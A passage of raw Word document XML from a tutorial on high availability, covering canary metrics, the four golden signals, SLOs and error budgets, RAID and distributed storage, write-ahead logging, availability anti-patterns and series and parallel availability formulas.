      </w:r>
    </w:p>
    <w:p w14:paraId="18F796F3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6697A1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>The canary monitoring system compares metrics between canary and baseline in real-time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D3F3E7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>p50/p95/p99 latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540947F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Error rates (HTTP 5xx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DB316" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Business metrics (conversion rate, success rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C42DD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>System metrics (CPU, memory, GC pauses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533DD307" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If any metric degrades beyond a statistical threshold (e.g., &gt; 2 standard deviations worse), automatic rollback triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D59CF9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="426AC6BE">
          <v:rect id="_x0000_i1699" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF39F5F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Observability for Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1335F215" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 The Four Golden Signals (Google SRE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1794B8C4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Distribution of request durations (not just average — p50, p95, p99).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F810654" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Requests per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC9729" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Rate of failed requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FE725" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saturation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How "full" your resources are (CPU, memory, disk I/O, connection pools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21735BD2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 SLIs, SLOs, and SLAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619657E9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLI (Service Level Indicator):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A measurable metric. "99.3% of requests completed in &lt; 300ms."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB77091" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLO (Service Level Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Your internal target. "We aim for 99.9% availability measured by successful responses."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B664C3C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLA (Service Level Agreement):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Contractual commitment with consequences (refunds) for violation. Always less aggressive than your SLO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E87604E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes of SLO monitoring — Error Budgets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A866740" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If your SLO is 99.9% availability per month:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4133F710" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Total minutes in a month: ~43,200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A0179" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Error budget: 43.2 minutes of allowed downtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C373E93" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>You track burn rate: how fast are you consuming your error budget?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68490C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>If you've used 50% of your monthly budget in the first week, that's a high burn rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C726D1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When burn rate exceeds threshold, page engineers and freeze deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028ECCE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This creates a data-driven balance between development velocity and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D115C40" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="15572CA2">
          <v:rect id="_x0000_i1700" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CCCAD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Data Availability Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C150959" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 RAID for Storage Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1488F4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAID 1 (Mirroring):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Every write goes to 2 disks. One can fail without data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6C898" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAID 5 (Striping + Parity):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Data + parity across N disks. Can tolerate 1 disk failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA1B6D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAID 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Can tolerate 2 simultaneous disk failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B04E1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAID 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Mirrored stripes. Best performance + redundancy, but uses 50% of raw capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7153D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At cloud scale, RAID is replaced by distributed storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C569569" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Systems like GFS, HDFS, and Ceph replicate data chunks across multiple machines (typically 3 replicas on different racks). This protects against machine, rack, and even AZ failures — something local RAID cannot do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEA53B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Write-Ahead Logging (WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170571DF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it ensures data availability after crash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE3CA5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Before modifying actual data files, write the intended change to a sequential log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C996E78" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The log is fsynced to disk (durable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652FB3FA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Acknowledge the write to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72187B79" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Later, apply the change to the actual data files (checkpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045C240" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>On crash recovery: replay the WAL from the last checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F39DD4C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this works:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Sequential writes to the log are fast (append-only). The data files can be updated lazily. Even if the system crashes mid-update, the WAL has the complete record of what should have happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBBAD2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="4C5812E0">
          <v:rect id="_x0000_i1701" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B0134" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Anti-Patterns That Kill Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B19E57C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Single points of failure (SPOF):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Any component where failure = system failure. Even load balancers must be redundant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B85855C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correlated failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> All instances on the same physical host, same rack, or same AZ. One failure takes everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A06EB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thundering herd on recovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> System comes back after failure. All clients reconnect simultaneously. System immediately crashes again. Solution: exponential backoff with jitter on client reconnection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C83FD0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unbounded queues:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Queue grows indefinitely when consumers are slow. Eventually OOM kills the process. Solution: bounded queues with backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0144CB42" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shared fate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Two "redundant" services running on the same machine, same network switch, or even the same Kubernetes node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47365B66" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GC pauses as false failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A Java service has a long GC pause (5 seconds). Heartbeats are missed. The orchestrator kills it and starts a new one. The new one has cold caches, GCs more aggressively, gets killed. Cycle repeats. Solution: tune GC, set health check intervals longer than max GC pause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D2948" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="69D8F4E9">
          <v:rect id="_x0000_i1702" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10056A34" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Calculating System Availability — Worked Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC80576" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Series (all must work):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26865F07" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF85D3F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_total = A1 × A2 × A3 × ... × An</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DFB39" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Web Server (99.9%) → App Server (99.9%) → Database (99.9%):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BA288" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D719AC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>= 0.999 × 0.999 × 0.999 = 0.997 (99.7%) — 2.6 hours downtime/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34007BEE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parallel (one must work):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F25E5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D70CD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A_total = 1 - (1 - A1) × (1 - A2) × ... × (1 - An)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D1B32" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
